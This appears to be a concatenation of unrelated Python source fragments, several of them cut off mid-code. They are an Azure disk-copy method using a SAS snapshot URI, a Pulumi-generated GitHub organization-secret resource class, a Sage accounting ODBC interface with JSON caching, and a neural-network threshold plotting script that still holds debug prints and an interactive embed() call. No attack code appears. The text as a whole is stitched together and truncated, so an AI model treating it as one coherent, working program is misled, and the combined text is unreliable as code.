"""Create a new disk based on a SAS snapshot URI.
This is useful if e.g. one wants to make a copy of a disk in a separate
Azure account. This method will create a temporary Azure Storage account
within the destination account, import the snapshot from a downloadable
link (the source account needs to share the snapshot through a SAS link)
and then create a disk from the VHD file saved in storage. The Azure
storage account is then deleted.
Args:
snapshot (AZSnapshot): Source snapshot to use.
snapshot_uri (str): The URI of the snapshot to copy.
region (str): Optional. The region in which to create the disk. If not
provided, the disk will be created in the default_region associated with
the AZAccount object.
disk_name (str): Optional. String to use as new disk name.
disk_name_prefix (str): Optional. String to prefix the disk name with.
disk_type (str): Optional. The sku name for the disk to create. Can be
Standard_LRS, Premium_LRS, StandardSSD_LRS, or UltraSSD_LRS.
Default is Standard_LRS.
Returns:
AZDisk: Azure Compute Disk.
Raises:
RuntimeError: If the disk could not be created.
"""
if not region:
region = self.default_region
# Create a temporary Azure account storage to import the snapshot
storage_account_name = hashlib.sha1(
snapshot.resource_id.encode('utf-8')).hexdigest()[:23]
storage_account_url = 'https://{0:s}.blob.core.windows.net'.format(
storage_account_name)
storage_account_id, storage_account_access_key = self._CreateStorageAccount(
storage_account_name, region=region)
blob_service_client = blob.BlobServiceClient(
account_url=storage_account_url, credential=storage_account_access_key)
# Create a container within the Storage to receive the imported snapshot
container_name = storage_account_name + '-container'
snapshot_vhd_name = snapshot.name + '.vhd'
container_client = blob_service_client.get_container_client(container_name)
try:
logger.info('Creating blob container {0:s}'.format(container_name))
container_client.create_container()
logger.info('Blob container {0:s} successfully created'.format(
container_name))
except exceptions.ResourceExistsError:
# The container already exists, so we can re-use it
logger.warning('Reusing existing container: {0:s}'.format(container_name))
# Download the snapshot from the URI to the storage
copied_blob = blob_service_client.get_blob_client(
container_name, snapshot_vhd_name)
logger.info('Importing snapshot to container from URI {0:s}. '
'Depending on the size of the snapshot, this process is going '
'to take a while.'.format(snapshot_uri))
copied_blob.start_copy_from_url(snapshot_uri)
copy_status = copied_blob.get_blob_properties().copy.status
| |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['ActionsOrganizationSecretArgs', 'ActionsOrganizationSecret']
@pulumi.input_type
class ActionsOrganizationSecretArgs:
def __init__(__self__, *,
secret_name: pulumi.Input[str],
visibility: pulumi.Input[str],
encrypted_value: Optional[pulumi.Input[str]] = None,
plaintext_value: Optional[pulumi.Input[str]] = None,
selected_repository_ids: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None):
"""
The set of arguments for constructing a ActionsOrganizationSecret resource.
:param pulumi.Input[str] secret_name: Name of the secret
:param pulumi.Input[str] encrypted_value: Encrypted value of the secret using the Github public key in Base64 format.
:param pulumi.Input[str] plaintext_value: Plaintext value of the secret to be encrypted
:param pulumi.Input[Sequence[pulumi.Input[int]]] selected_repository_ids: An array of repository ids that can access the organization secret.
"""
pulumi.set(__self__, "secret_name", secret_name)
pulumi.set(__self__, "visibility", visibility)
if encrypted_value is not None:
pulumi.set(__self__, "encrypted_value", encrypted_value)
if plaintext_value is not None:
pulumi.set(__self__, "plaintext_value", plaintext_value)
if selected_repository_ids is not None:
pulumi.set(__self__, "selected_repository_ids", selected_repository_ids)
@property
@pulumi.getter(name="secretName")
def secret_name(self) -> pulumi.Input[str]:
"""
Name of the secret
"""
return pulumi.get(self, "secret_name")
@secret_name.setter
def secret_name(self, value: pulumi.Input[str]):
pulumi.set(self, "secret_name", value)
@property
@pulumi.getter
def visibility(self) -> pulumi.Input[str]:
return pulumi.get(self, "visibility")
@visibility.setter
def visibility(self, value: pulumi.Input[str]):
pulumi.set(self, "visibility", value)
@property
@pulumi.getter(name="encryptedValue")
def encrypted_value(self) -> Optional[pulumi.Input[str]]:
"""
Encrypted value of the secret using the Github public key in Base64 format.
"""
return pulumi.get(self, "encrypted_value")
@encrypted_value.setter
def encrypted_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "encrypted_value", value)
@property
@pulumi.getter(name="plaintextValue")
def plaintext_value(self) -> Optional[pulumi.Input[str]]:
"""
Plaintext value of the secret to be encrypted
"""
return pulumi.get(self, "plaintext_value")
@plaintext_value.setter
def plaintext_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "plaintext_value", value)
@property
@pulumi.getter(name="selectedRepositoryIds")
def selected_repository_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]:
"""
An array of repository ids that can access the organization secret.
"""
return pulumi.get(self, "selected_repository_ids")
@selected_repository_ids.setter
def selected_repository_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]):
pulumi.set(self, "selected_repository_ids", value)
@pulumi.input_type
class _ActionsOrganizationSecretState:
def __init__(__self__, *,
created_at: Optional[pulumi.Input[str]] = None,
encrypted_value: Optional[pulumi.Input[str]] = None,
plaintext_value: Optional[pulumi.Input[str]] = None,
secret_name: Optional[pulumi.Input[str]] = None,
selected_repository_ids: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
updated_at: Optional[pulumi.Input[str]] = None,
visibility: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ActionsOrganizationSecret resources.
:param pulumi.Input[str] created_at: Date of actions_secret creation.
:param pulumi.Input[str] encrypted_value: Encrypted value of the secret using the Github public key in Base64 format.
:param pulumi.Input[str] plaintext_value: Plaintext value of the secret to be encrypted
:param pulumi.Input[str] secret_name: Name of the secret
:param pulumi.Input[Sequence[pulumi.Input[int]]] selected_repository_ids: An array of repository ids that can access the organization secret.
:param pulumi.Input[str] updated_at: Date of actions_secret update.
"""
if created_at is not None:
pulumi.set(__self__, "created_at", created_at)
if encrypted_value is not None:
pulumi.set(__self__, "encrypted_value", encrypted_value)
if plaintext_value is not None:
pulumi.set(__self__, "plaintext_value", plaintext_value)
if secret_name is not None:
pulumi.set(__self__, "secret_name", secret_name)
if selected_repository_ids is not None:
pulumi.set(__self__, "selected_repository_ids", selected_repository_ids)
if updated_at is not None:
pulumi.set(__self__, "updated_at", updated_at)
if visibility is not None:
pulumi.set(__self__, "visibility", visibility)
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> Optional[pulumi.Input[str]]:
"""
Date of actions_secret creation.
"""
return pulumi.get(self, "created_at")
@created_at.setter
def created_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "created_at", value)
@property
@pulumi.getter(name="encryptedValue")
def encrypted_value(self) -> Optional[pulumi.Input[str]]:
"""
Encrypted value of the secret using the Github public key in Base64 format.
"""
return pulumi.get(self, "encrypted_value")
@encrypted_value.setter
def encrypted_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "encrypted_value", value)
@property
@pulumi.getter(name="plaintextValue")
def plaintext_value(self) -> Optional[pulumi.Input[str]]:
"""
Plaintext value of the secret to be encrypted
"""
return pulumi.get(self, "plaintext_value")
@plaintext_value.setter
def plaintext_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "plaintext_value", value)
@property
@pulumi.getter(name="secretName")
def secret_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the secret
"""
return pulumi.get(self, "secret_name")
@secret_name.setter
def secret_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "secret_name", value)
@property
@pulumi.getter(name="selectedRepositoryIds")
def selected_repository_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]:
"""
An array of repository ids that can access the organization secret.
"""
return pulumi.get(self, "selected_repository_ids")
@selected_repository_ids.setter
def selected_repository_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]):
pulumi.set(self, "selected_repository_ids", value)
@property
@pulumi.getter(name="updatedAt")
def updated_at(self) -> Optional[pulumi.Input[str]]:
"""
Date of actions_secret update.
"""
return pulumi.get(self, "updated_at")
@updated_at.setter
def updated_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "updated_at", value)
@property
@pulumi.getter
def visibility(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "visibility")
@visibility.setter
def visibility(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "visibility", value)
class ActionsOrganizationSecret(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
encrypted_value: Optional[pulumi.Input[str]] = None,
plaintext_value: Optional[pulumi.Input[str]] = None,
secret_name: Optional[pulumi.Input[str]] = None,
selected_repository_ids: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
visibility: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
## Import
This resource can be imported using an ID made up of the secret name
```sh
$ pulumi import github:index/actionsOrganizationSecret:ActionsOrganizationSecret test_secret test_secret_name
```
NOTE: the implementation is limited in that it won't fetch the value of the `plaintext_value` or `encrypted_value` fields when importing. You may need to ignore changes for these as a workaround.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] encrypted_value: Encrypted value of the secret using the Github public key in Base64 format.
:param pulumi.Input[str] plaintext_value: Plaintext value of the secret to be encrypted
:param pulumi.Input[str] secret_name: Name of the secret
:param pulumi.Input[Sequence[pulumi.Input[int]]] selected_repository_ids: An array of repository ids that can access the organization secret.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ActionsOrganizationSecretArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## Import
This resource can be imported using an ID made up of the secret name
```sh
$ pulumi import github:index/actionsOrganizationSecret:ActionsOrganizationSecret test_secret test_secret_name
```
NOTE: the implementation is limited in that it won't fetch the value of the `plaintext_value` or `encrypted_value` fields when importing. You may need to ignore changes for these as a workaround.
:param str resource_name: The name of the resource.
:param ActionsOrganizationSecretArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
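# A hedged usage sketch, assuming the provider SDK is installed and imported as
# `pulumi_github`; the secret name, value, and repository id are made-up values.
#
#   import pulumi_github as github
#   secret = github.ActionsOrganizationSecret('example',
#       secret_name='deploy_token',
#       visibility='selected',
#       plaintext_value='s3cr3t',
#       selected_repository_ids=[123456])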
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ActionsOrganizationSecretArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
encrypted_value: Optional[pulumi.Input[str]] = None,
plaintext_value: Optional[pulumi.Input[str]] = None,
secret_name: Optional[pulumi.Input[str]] = None,
selected_repository_ids: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
visibility: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ActionsOrganizationSecretArgs.__new__(ActionsOrganizationSecretArgs)
__props__.__dict__["encrypted_value"] = encrypted_value
__props__.__dict__["plaintext_value"] = plaintext_value
if secret_name is None and not opts.urn:
raise TypeError("Missing required property 'secret_name'")
__props__.__dict__["secret_name"] = secret_name
__props__.__dict__["selected_repository_ids"] = selected_repository_ids
if visibility is None and not opts.urn:
raise TypeError("Missing required property 'visibility'")
__props__.__dict__["visibility"] = visibility
__props__.__dict__["created_at"] = None
__props__.__dict__["updated_at"] = None
super(ActionsOrganizationSecret, __self__).__init__(
'github:index/actionsOrganizationSecret:ActionsOrganizationSecret',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
created_at: Optional[pulumi.Input[str]] = None,
encrypted_value: Optional[pulumi.Input[str]] = None,
plaintext_value: Optional[pulumi.Input[str]] = None,
secret_name: Optional[pulumi.Input[str]] = None,
selected_repository_ids: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
updated_at: Optional[pulumi.Input[str]] = None,
visibility: Optional[pulumi.Input[str]] = None) -> 'ActionsOrganizationSecret':
"""
Get an existing ActionsOrganizationSecret resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] created_at: Date of actions_secret creation.
:param pulumi.Input[str] encrypted_value: Encrypted value of the secret using the Github public key in Base64 format.
:param pulumi.Input[str] plaintext_value: Plaintext value of the secret to be encrypted
:param pulumi.Input[str] secret_name: Name of the secret
:param pulumi.Input[Sequence[pulumi.Input[int]]] selected_repository_ids: An array of repository ids that can access the organization secret.
:param pulumi.Input[str] updated_at: Date of actions_secret update.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ActionsOrganizationSecretState.__new__(_ActionsOrganizationSecretState)
__props__.__dict__["created_at"] = created_at
__props__.__dict__["encrypted_value"] = encrypted_value
__props__.__dict__["plaintext_value"] = plaintext_value
__props__.__dict__["secret_name"] = secret_name
__props__.__dict__["selected_repository_ids"] = selected_repository_ids
__props__.__dict__["updated_at"] = updated_at
__props__.__dict__["visibility"] = visibility
return ActionsOrganizationSecret(resource_name, opts=opts, __props__=__props__)
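# Illustrative lookup of an already-provisioned secret (the id value is made up):
#
#   existing = ActionsOrganizationSecret.get('imported-secret', id='test_secret_name')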
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> pulumi.Output[str]:
"""
Date of actions_secret creation.
"""
return pulumi.get(self, "created_at")
@property
@pulumi.getter(name="encryptedValue")
def encrypted_value(self) -> pulumi.Output[Optional[str]]:
"""
Encrypted value of the secret using the Github public key in Base64 format.
"""
return pulumi.get(self, "encrypted_value")
@property
@pulumi.getter(name="plaintextValue")
def plaintext_value(self) -> pulumi.Output[Optional[str]]:
"""
Plaintext value of the secret to be encrypted
"""
return pulumi.get(self, "plaintext_value")
@property
@pulumi.getter(name="secretName")
def secret_name(self) -> | |
"""Interface to Sage accounting ODBC
This provides an interface to extract data from the accounting system.
It works by extracting the data into a Pandas dataframe and then doing queries from that.
"""
import json
import numpy as np
import pandas as pd
import pyodbc
import os
from dotenv import load_dotenv, find_dotenv
from luca import p
class PySageError(Exception):
pass
def get_default_connection_string():
# Make sure environment variables loaded.
try:
try:
# Python 2
connection_string = os.environ['PYSAGE_CNXN'].decode('utf8')
except AttributeError:
# Python 3
connection_string = os.environ['PYSAGE_CNXN']
except KeyError:
raise PySageError('Environment missing PYSAGE_CNXN setting. '
+ 'Check that a .env file defining it can be found.')
return connection_string
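# Example .env entry (purely illustrative - the DSN name and credentials are
# placeholders, not the values used by any real installation):
#
#   PYSAGE_CNXN=DSN=SageLine50;UID=manager;PWD=secret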
def get_max_transaction_in_sage(cnxn):
sql = """
SELECT
max(TRAN_NUMBER)
FROM
AUDIT_JOURNAL
"""
df = pd.read_sql(sql, cnxn)
return int(df.iloc[0,0])
def check_cache_upto_date():
"""This looks at the highest transaction and sees if a newer one is in the database. It is not perfect
as only checks the transactions and donesn't notice if a file has been edited wihtout adding new transactions.
"""
connection_string = get_default_connection_string()
cnxn = pyodbc.connect(connection_string)
# Get the maximum transaction number
json_check_file_name = 'SageODBC_check.json'
# Read it from file
try:
with open(json_check_file_name) as f:
data = json.load(f)
max_transaction_stored = data['max_transaction_stored']
except (FileNotFoundError, ValueError): # Triggered if the file does not exist or contains no valid JSON
max_transaction_stored = 0
max_transaction_in_sage = get_max_transaction_in_sage(cnxn)
# Update file
data = {'max_transaction_stored': max_transaction_in_sage}
with open(json_check_file_name, 'w') as f:
json.dump(data, f)
update_cache = (max_transaction_stored == 0) or max_transaction_stored != max_transaction_in_sage
return update_cache
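# The check file written above is a one-entry JSON document, e.g. (the number is
# illustrative):
#
#   {"max_transaction_stored": 123456}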
def get_dataframe_sage_odbc_query(sql, name, cache_upto_date):
"""This executes a SQL query if it needs to or pulls in a json file from disk.
The results of the SQL query are returned as a dataframe. To decide which to do
the maximum transaction is compared to the json file."""
connection_string = get_default_connection_string()
cnxn = pyodbc.connect(connection_string)
json_file_name = name + '.json'
if cache_upto_date: # read memoised data
try:
df = pd.read_json(json_file_name)
# Need to fix those records that are integer but normally stored as strings. On memoization these are
# converted to integers, so they now need to be converted back to strings to be compatible.
for fn in ['ACCOUNT_REF', 'INV_REF']:
df[fn] = df[fn].astype('str')
except (FileNotFoundError, ValueError): # Triggered if the file does not exist or contains no valid JSON
cache_upto_date = False
if not cache_upto_date: # May have been original but no data file
# Read fresh data from sage
df = pd.read_sql(sql, cnxn)
# Update files
df.to_json(json_file_name)
return df
sage_all_data = """
SELECT
aj.TRAN_NUMBER, aj.TYPE, aj.DATE, nl.ACCOUNT_REF, aj.ACCOUNT_REF as ALT_REF, aj.INV_REF, aj.DETAILS, AJ.TAX_CODE,
aj.AMOUNT, aj.FOREIGN_AMOUNT, aj.BANK_FLAG, ah.DATE_BANK_RECONCILED, aj.EXTRA_REF, aj.PAID_FLAG, ah.OUTSTANDING
FROM
NOMINAL_LEDGER nl, AUDIT_HEADER ah
LEFT OUTER JOIN AUDIT_JOURNAL aj ON nl.ACCOUNT_REF = aj.NOMINAL_CODE
WHERE
aj.HEADER_NUMBER = ah.HEADER_NUMBER AND
aj.DATE > '2000-01-01' AND aj.DELETED_FLAG = 0
"""
sage_all_invoice_lines = """
SELECT
INVOICE_NUMBER, ITEM_NUMBER, DESCRIPTION, TEXT, STOCK_CODE, COMMENT_1, COMMENT_2, UNIT_OF_SALE,
QUANTITY, UNIT_PRICE, DISCOUNT_AMOUNT, DISCOUNT_RATE, TAX_CODE, TAX_RATE,
NET_AMOUNT, TAX_AMOUNT, GROSS_AMOUNT
FROM
INVOICE_ITEM
"""
sage_all_invoices = """
SELECT
INVOICE_NUMBER, DEL_NAME, DEL_ADDRESS_1, DEL_ADDRESS_2, DEL_ADDRESS_3, DEL_ADDRESS_4, DEL_ADDRESS_5,
CARR_NET, CARR_TAX, CARR_GROSS, SETTLEMENT_DUE_DAYS, ORDER_NUMBER, CUST_ORDER_NUMBER
FROM
INVOICE
"""
class Singleton(type):
instance = None
def __call__(cls, *args, **kw):
if not cls.instance:
cls.instance = super(Singleton, cls).__call__(*args, **kw)
return cls.instance
class Sage(metaclass=Singleton):
"""Interface to SAGE line 50 account system.
"""
def __init__(self, connection_string=''):
""" If update_cache then make sure you keep updating from the database"""
load_dotenv(find_dotenv())
if connection_string == '':
connection_string = get_default_connection_string()
self.update_cache()
def update_cache(self):
self.load_data(update_cache=True)
def load_data(self, update_cache=False):
if not update_cache:
cache_is_upto_date = check_cache_upto_date()
else:
cache_is_upto_date = False
self.sqldata = get_dataframe_sage_odbc_query(sage_all_data, 'SageODBC', cache_is_upto_date)
if self.sqldata['DATE'].dtype == np.object:
self.sqldata['DATE'] = self.sqldata['DATE'].astype('datetime64')
self.invoices = get_dataframe_sage_odbc_query(sage_all_invoices, 'SageInvoices',
cache_is_upto_date)
self.invoice_lines = get_dataframe_sage_odbc_query(sage_all_invoice_lines, 'SageInvoiceLines',
cache_is_upto_date)
def using_reference_get(self, i, field, numchars=30, record_type = ['SI']):
"""
Using the invoice number we can look up the field. The accounting database contains line entries.
So this aggregates the line entries and returns the sum of the field if numeric.
"""
df = self.sqldata[(self.sqldata['TYPE'].isin(record_type))
& (self.sqldata['ACCOUNT_REF'] == '1100')
& (self.sqldata['INV_REF'] == str(i))
]
if len(df) == 0: # It is an error to look up data where there is none
raise PySageError('No data found in Audit Header to match invoice {}'.format(i))
elif field in ['TRAN_NUMBER']:
return list(df[:1][field])[0]
elif field in ['DATE', 'TYPE', 'ACCOUNT_REF', 'ALT_REF', 'INV_REF', 'TAX_CODE',
'BANK_FLAG', 'DATE_BANK_RECONCILED']:
return list(df[field])[0]
elif field in ['OUTSTANDING']:
return p(list(df[field])[0])
elif field in ['AMOUNT', 'FOREIGN_AMOUNT']:
return p(df[field].sum())
elif field == 'GROSS_AMOUNT':
return p(df['AMOUNT'].sum())
elif field in ['NET_AMOUNT']:
df2 = self.sqldata[(self.sqldata['TYPE'].isin(record_type))
& (self.sqldata['ACCOUNT_REF'] == '2200') # Get VAT control account
& (self.sqldata['INV_REF']== str(i))
]
return p(df['AMOUNT'].sum() + df2['AMOUNT'].sum())
elif field in ['TAX_AMOUNT']:
df2 = self.sqldata[(self.sqldata['TYPE'].isin(record_type))
& (self.sqldata['ACCOUNT_REF'] == '2200') # Get VAT control account
& (self.sqldata['INV_REF']== str(i))
]
return p(- df2['AMOUNT'].sum())
elif field in ['TAX_RATE']:
df2 = self.sqldata[(self.sqldata['TYPE'].isin(record_type))
& (self.sqldata['ACCOUNT_REF'] == '4000') # Get net Sales amount
& (self.sqldata['INV_REF']== str(i))
]
return 100 * ((float(df['AMOUNT'].sum()) / float(- df2['AMOUNT'].sum())) - 1.0)
elif field in ['DETAILS', 'EXTRA_REF']:
return df[field].str.cat()[:numchars]
else:
raise PySageError('Unmatched get field {} for using_invoice_get '.format(field))
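# Hedged example (the invoice number is made up): summing the gross amount of
# all sales-invoice lines posted against invoice 59001.
#
#   sage = Sage()
#   gross = sage.using_reference_get(59001, 'GROSS_AMOUNT', record_type=['SI'])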
def get_field(self, row, field):
""" For use in a lambda
lambda row: self.get_field(row,'This Field')
"""
result = None
if row['Member Code'] not in ('4552', '4424'): # TODO Ignore enrichment for AIS discount and AIS invoices
if row['Document Type'] in ('Invoice',):
result = self.using_reference_get(row['Your Ref'], field, record_type=['SI'])
if row['Document Type'] in ('Credit Note',):
try:
result = self.using_reference_get(row['Your Ref'], field, record_type=['SC'])
except PySageError: # Perhaps this is a credit note for an invoice because AIS stuffed up eg invoice
# 59088. So just see if it works as an invoice reference
result = self.using_reference_get(row['Your Ref'], field, record_type=['SI'])
return result
def enrich_remittance_doc(self, remittance_doc):
"""Enrich a raw remittance document with data from Sage
It uses getField which uses 3 predefined columns:
'Your Ref' is our invoice number
'Member Code' is an AIS specfic membership code and defines some exceptions
'Document Type' defines the type of document. We are only enriching 'Invoice' and 'Credit Note'
"""
def get_series(field):
return remittance_doc.df.apply(lambda row: self.get_field(row, field), axis=1)
remittance_doc.df['Account_Ref'] = get_series('ALT_REF')
remittance_doc.df['Sage_Net_Amount'] = get_series('NET_AMOUNT')
remittance_doc.df['Sage_Gross_Amount'] = get_series('GROSS_AMOUNT')
remittance_doc.df['Sage_VAT_Amount'] = get_series('TAX_AMOUNT')
remittance_doc.df['Sage_Tax_Rate'] = get_series('TAX_RATE') / 100
net = remittance_doc.df['Sage_Net_Amount'].sum()
vat = remittance_doc.df['Sage_VAT_Amount'].sum()
gross = remittance_doc.df['Sage_Gross_Amount'].sum()
# Check Sage calculations - shouldn't be a problem. If this check passes we can then rely on two of the
# three values to set the third. Note that due to rounding you can't calculate them except approximately unless
# you have access to the line items.
if ( p(net + vat) != p(gross) ):
remittance_doc.checked = False
raise PySageError("Internal calcs of sum in Sage don't add up. net + vat != gross, {} + {} != {}".format(
net, vat, gross
))
# Check that gross AIS doc values match Sage gross values TODO remove specific for local installation
gross_sum_ex_discount = remittance_doc.df[remittance_doc.df['Member Code'] != '4552']['Sage_Gross_Amount'].sum()
if gross != gross_sum_ex_discount:
remittance_doc.checked = False
raise PySageError("Adding up total AIS invoices doesn't equal Sage sum, {} != {}, types {}, {}".format(
gross_sum_ex_discount, gross, type(gross_sum_ex_discount), type(gross)
))
# The internal sum has already been done. It is not until the next stage that we calculate discounts
def check_for_transactions_in_the_month(self, journal_type, account, date):
# c = 'Type of date {} account = {} Type of account {} journal type = {}'.format(type(date), account,
# type(account), journal_type)
# return (True, 0, c)
# d2 = pd.to_datetime(date, format='%d/%m/%Y')
# d2 = dt.datetime(2014,12,15)
en = date + pd.offsets.MonthEnd(0)
st = en - pd.offsets.MonthBegin(1)
test2 = self.sqldata[self.sqldata['ACCOUNT_REF'] == int(account)]
test1 = test2[test2['DATE'] >= st]
test = test1[test1['DATE'] <= en]
l = len(test)
if l == 0:
comment = 'Found no transactions from {} up to {}.'.format(
st.strftime('%Y-%m-%d'), en.strftime('%Y-%m-%d'), )
return (False, 0, comment)
else:
tn = test[:1]
# TODO make next a function and reuse below
comment = 'Found {} transactions from {} up to {}. First was on {}: details {}: for {}.'.format(
l, st.strftime('%Y-%m-%d'), en.strftime('%Y-%m-%d'),
list(tn['DATE'])[0].strftime('%Y-%m-%d'),
list(tn['DETAILS'])[0],
p(list(tn['AMOUNT'])[0]),)
return (True, 0, comment)
def detailed_check_for_transactions_in_the_month(self, journal_type, account, date, details):
en = date + pd.offsets.MonthEnd(0)
st = en - pd.offsets.MonthBegin(1)
test1 = self.sqldata[self.sqldata['ACCOUNT_REF'] == int(account)]
test2 = test1[test1['DATE'] >= st]
test3 = test2[test2['DATE'] <= en]
test = test3[test3['DETAILS'] == details] # Exact match is ok since looking for machine duplicates
l = len(test)
if l == 0:
comment = 'Found no transactions from {} up to {}.'.format(
st.strftime('%Y-%m-%d'), en.strftime('%Y-%m-%d'), )
return (False, 0, comment)
else:
| |
list(nn._feature_names)))
return unsafe
def calculate_thresh1(x, feature, target, debug=False):
try:
idx = target.index[target == 0][-1] #index of last zero
slope, intercept, r_value, p_value, std_err = stats.linregress(feature[(target.index > idx) & ~target.isnull()], target[(target.index > idx) & ~target.isnull()])
thresh_pred = x * slope + intercept
thresh1 = x[thresh_pred < 0][-1]
except (ValueError, IndexError):
thresh1 = np.NaN
if debug:
print('No threshold1')
return thresh1
def calculate_thresh2(feature, target, debug=False):
if len(target.shape) > 1:
raise NotImplementedError('2D threshold not implemented yet')
try:
idx = np.where(target == 0)[0][-1] #Only works for 1D
idx2 = np.where(~np.isnan(target[idx+1:]))[0][0] + idx + 1
#idx = np.arange(target.shape[0]),target.shape[1] - 1 - (target[:,::-1]==0).argmax(1) #Works for 2D
thresh2 = (feature[idx] + feature[idx2]) / 2
except IndexError:
thresh2 = np.NaN
if debug:
print('No threshold2')
return thresh2
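# Worked example of calculate_thresh2 (made-up arrays): the threshold is the
# midpoint between the last zero of the target and the next defined point.
#
#   feature = np.array([0., 1., 2., 3., 4.])
#   target = np.array([1., 0., 0., np.nan, 2.])
#   calculate_thresh2(feature, target)  # -> (2. + 4.) / 2 = 3.0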
#5.4 ms ± 115 µs per loop (mean ± std. dev. of 7 runs, 100 loops each) total
def process_chunk(target_names, chunck, settings=None, unsafe=False):
res = []
for ii, row in enumerate(chunck.iterrows()):
res.append(process_row(target_names, row, settings=settings, unsafe=unsafe))
return res
def process_row(target_names, row, ax1=None, unsafe=False, settings=None):
index, slice_ = row
feature = slice_.index.levels[1]
#target = slice.loc[target_names]
target = slice_.values[:len(feature) * len(target_names)].reshape(len(target_names), len(feature))
if np.all(np.logical_or(target == 0, np.isnan(target))):
return (1,)
else:
# 156 µs ± 10.4 µs per loop (mean ± std. dev. of 7 runs, 10000 loops each) (no zerocolors)
thresh_nn = np.empty(len(target_names) * len(nns))
thresh_nn_i = np.empty_like(thresh_nn, dtype='int64')
popbacks = np.empty_like(thresh_nn)
thresh1_misses = np.empty_like(thresh_nn)
thresh2_misses = np.empty_like(thresh_nn)
if settings['plot_zerocolors']:
maxgam = slice_['maxgam']
# Create slice, assume sorted
# 14.8 µs ± 1.27 µs per loop (mean ± std. dev. of 7 runs, 100000 loops each)
x = np.linspace(feature.values[0],
feature.values[-1],
200)
#if plot:
if not ax1 and settings['plot']:
fig = plt.figure()
if settings['plot_pop'] and settings['plot_slice']:
gs = gridspec.GridSpec(2, 2, height_ratios=[10, 1], width_ratios=[5,1],
left=0.05, right=0.95, wspace=0.05, hspace=0.05)
ax2 = plt.subplot(gs[1,0])
ax3 = plt.subplot(gs[0,1])
if not settings['plot_pop'] and settings['plot_slice']:
gs = gridspec.GridSpec(2, 1, height_ratios=[10, 2], width_ratios=[1],
left=0.05, right=0.95, wspace=0.05, hspace=0.05)
ax2 = plt.subplot(gs[1,0])
if not settings['plot_pop'] and not settings['plot_slice']:
gs = gridspec.GridSpec(1, 1, height_ratios=[1], width_ratios=[1],
left=0.05, right=0.95, wspace=0.05, hspace=0.05)
ax1 = plt.subplot(gs[0,0])
#ax1.set_prop_cycle(cycler('color', ['#f1eef6','#d7b5d8','#df65b0','#dd1c77','#980043']))
# http://tristen.ca/hcl-picker/#/clh/5/273/2A0A75/D59FEB
#ax1.set_prop_cycle(cycler('color', ['#2A0A75','#6330B8','#9F63E2','#D59FEB']))
if len(nns) == 1:
color_range = np.array([.7])
else:
color_range = np.linspace(0, 0.9, len(nns))
ax1.set_prop_cycle(cycler('color', plt.cm.plasma(color_range)))
ax1.set_xlabel(nameconvert[slicedim])
ax1.set_ylabel(nameconvert[list(nns.items())[0][1]._target_names[0]])
if settings['calc_thresh1']:
thresh1 = calculate_thresh1(x, feature, target, debug=settings['debug'])
print('whyyy?')
# 12.5 µs ± 970 ns per loop (mean ± std. dev. of 7 runs, 100000 loops each)
if all(['ef' in name for name in target_names]):
thresh2 = calculate_thresh2(feature.values, target[0,:], debug=settings['debug'])
elif all(['pf' in name for name in target_names]):
thresh2 = calculate_thresh2(feature.values, np.abs(target[0,:]), debug=settings['debug'])
else:
thresh2 = np.nan
print('No thresh2!')
embed()
print('Weird stuff')
if settings['plot'] and settings['plot_threshlines']:
ax1.axvline(thresh2, c='black', linestyle='dashed')
if settings['plot'] and settings['plot_threshslope']:
if ~np.isnan(thresh2):
